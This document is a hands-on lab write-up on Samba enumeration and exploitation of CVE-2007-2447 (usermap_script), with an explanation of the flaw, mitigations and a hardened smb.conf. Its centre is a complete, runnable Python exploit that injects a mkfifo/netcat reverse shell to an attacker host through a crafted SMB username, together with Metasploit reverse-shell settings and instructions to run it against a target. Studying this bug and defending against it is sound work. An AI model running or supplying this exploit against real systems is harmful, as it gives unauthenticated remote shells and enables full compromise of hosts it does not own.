Hands-on security lab showcasing Samba (SMB) enumeration and exploitation of the usermap_script vulnerability (CVE-2007-2447) in a controlled environment.
This repository documents the exploitation of a vulnerable Samba service running on ports 139/tcp and 445/tcp.
The target machine was intentionally vulnerable and was used for learning and practice purposes only.
The vulnerability allows unauthenticated remote command execution through the username map script option in Samba 3.0.20 through 3.0.25rc3; the option is not enabled by default, so only hosts whose smb.conf sets it are exposed.
- Service: Samba (SMB)
- Ports: 139/tcp, 445/tcp
- Version Identified: Samba 3.0.20 (Debian)
- Environment: Lab / CTF machine
nmap -sV -p 139,445 <TARGET-IP>

The username map script option tells smbd to run an external script that maps a client-supplied username to a local account, and it does so before credentials are checked. Samba 3.0.0 through 3.0.25rc3 built that command line by pasting the raw username into a shell string, so a username containing shell metacharacters (backticks in particular) is executed by /bin/sh. Because the mapping happens before authentication, no valid account is needed: the attacker sends the crafted username in an SMB session setup (the CVE also lists the SamrChangePassword MS-RPC call) and the injected command runs with the privileges of the smbd process.
Impact:
- Remote Code Execution (RCE) in the context of the smbd process
- Full system compromise
- High-risk legacy vulnerability (CVE-2007-2447)
The vulnerability was exploited using the Metasploit Framework.
Metasploit module used: exploit/multi/samba/usermap_script
- RHOSTS: Target IP
- LHOST: Attacker IP
- LPORT: 4444
- Payload: cmd/unix/reverse_netcat
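To make the mechanism described above concrete, and to show the same trigger without msfconsole, here is an added example written for this write-up; it is not code from the original page, from Samba, or from the Metasploit module. The crafted username format (a slash, an equals sign, then a backtick-wrapped nohup command) is the one the Metasploit module sends; vulnerable_map and hardened_map are a constructed model of the shell-string splicing, not Samba's own source; pysmb (SMBConnection) is assumed to be installed for the live trigger; the target and attacker addresses are placeholders.

```python
#!/usr/bin/env python3
"""Added example for this write-up (not Metasploit or Samba code): shows why
Samba's 'username map script' option is injectable and how to trigger the bug
without msfconsole. pysmb is an assumption (pip install pysmb) and is imported
lazily so the offline helpers work without it."""
import subprocess


def reverse_shell_cmd(lhost: str, lport: int) -> str:
    """mkfifo-based reverse shell, the same technique Metasploit's
    cmd/unix/reverse_netcat payload uses, so it does not need 'nc -e' on the
    target. Deliberately contains no double quotes, because smbd wraps the
    username in them when it builds the command line (assumption)."""
    return (f"rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 "
            f"| nc {lhost} {lport} > /tmp/f")


def build_username(cmd: str) -> str:
    """Crafted username in the form the Metasploit module sends. The backticks
    are evaluated by /bin/sh when smbd runs the map script; nohup keeps the
    command alive after the failed SMB session is torn down."""
    return "/=`nohup " + cmd + "`"


def vulnerable_map(username: str, script: str = "echo") -> str:
    """Constructed model of the bug (not Samba's source): the username is spliced
    into a shell command string, so metacharacters inside it run as code.
    'echo' stands in for the mapping script so the demo is harmless."""
    cmdline = f'{script} "{username}"'
    return subprocess.run(["/bin/sh", "-c", cmdline],
                          capture_output=True, text=True).stdout


def hardened_map(username: str, script: str = "echo") -> str:
    """Fix for this bug class: pass the username as its own argv element so no
    shell ever parses it. Samba's actual patch may differ in detail (assumption)."""
    return subprocess.run([script, username],
                          capture_output=True, text=True).stdout


def trigger(target: str, username: str, port: int = 139, timeout: int = 5) -> None:
    """Deliver the crafted username in an SMB session setup using pysmb
    (assumption: 'pip install pysmb'). The login itself always fails; the
    injected command has already run by the time smbd rejects the user."""
    from smb.SMBConnection import SMBConnection
    conn = SMBConnection(username, "", "attacker", "target", use_ntlm_v2=False)
    try:
        conn.connect(target, port, timeout=timeout)
    except Exception:
        pass  # expected: the bogus username never authenticates
    finally:
        conn.close()


if __name__ == "__main__":
    import sys
    if len(sys.argv) != 4:
        sys.exit(f"usage: {sys.argv[0]} TARGET-IP LHOST LPORT   (run 'nc -lvnp LPORT' first)")
    target, lhost, lport = sys.argv[1], sys.argv[2], int(sys.argv[3])
    # Offline demonstration of the bug class on the local shell (benign command).
    print("vulnerable:", vulnerable_map("/=`echo INJECTED`").strip())
    print("hardened:  ", hardened_map("/=`echo INJECTED`").strip())
    # Live trigger against the lab target (placeholders; lab use only).
    trigger(target, build_username(reverse_shell_cmd(lhost, lport)))
```

Run the script with the lab target, your attacker IP and the listener port after starting a netcat listener; the two printed lines show the same username being executed in the string-splicing model and treated as inert data when passed as an argv element.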
After successful exploitation:
- Reverse shell was obtained
- Python was used to spawn a PTY and stabilize the shell
- Interactive command execution confirmed
Lessons learned:
- SMB services are critical attack surfaces
- Legacy services introduce severe security risks
- Enumeration is a crucial phase in penetration testing
- Known vulnerabilities can lead to full compromise
Mitigations:
- Upgrade Samba to a supported version (the fix for CVE-2007-2447 shipped in Samba 3.0.25)
- Remove the username map script option from smb.conf, or make sure any mapping script never passes the username through a shell
- Disable legacy SMB protocols (SMB1/NT1)
- Restrict SMB access using firewalls and Samba's own hosts allow / hosts deny settings
- Monitor SMB traffic and logs
- Remove unnecessary services
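The configuration side of these mitigations, as an added example for this write-up (constructed smb.conf excerpts, not copied from the lab target or from Samba's documentation): the first fragment shows the weak setting that exposes the bug, the second a hardened global section for a current Samba release. The script path and the network range are placeholders.

```ini
; --- Weak configuration (constructed, hypothetical path) ---
; smbd runs this script for every login attempt, splicing the client-supplied
; username into a shell command line before authentication. Remove it.
[global]
   workgroup = WORKGROUP
   username map script = /usr/local/bin/mapusers.sh

; --- Hardened configuration (current Samba release) ---
[global]
   workgroup = WORKGROUP
   ; static mapping file instead of an executable script
   username map = /etc/samba/smbusers
   ; refuse SMB1/NT1 entirely
   server min protocol = SMB2_02
   ; only the management subnet may talk to smbd (placeholder range)
   hosts allow = 10.0.0.0/255.255.255.0
   hosts deny = 0.0.0.0/0
   ; do not listen on every interface
   bind interfaces only = yes
   interfaces = lo eth0
```

Validate the result with testparm -s before restarting smbd; it prints the effective global section and flags unknown or misspelled parameters.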
This project was conducted strictly for educational purposes in a controlled lab environment. Unauthorized access or exploitation of systems you do not own is illegal and unethical.
References:
- CVE-2007-2447 (https://nvd.nist.gov/vuln/detail/CVE-2007-2447)
- Samba Security Advisories (https://www.samba.org/samba/security/CVE-2007-2447.html)
- Metasploit Framework Documentation

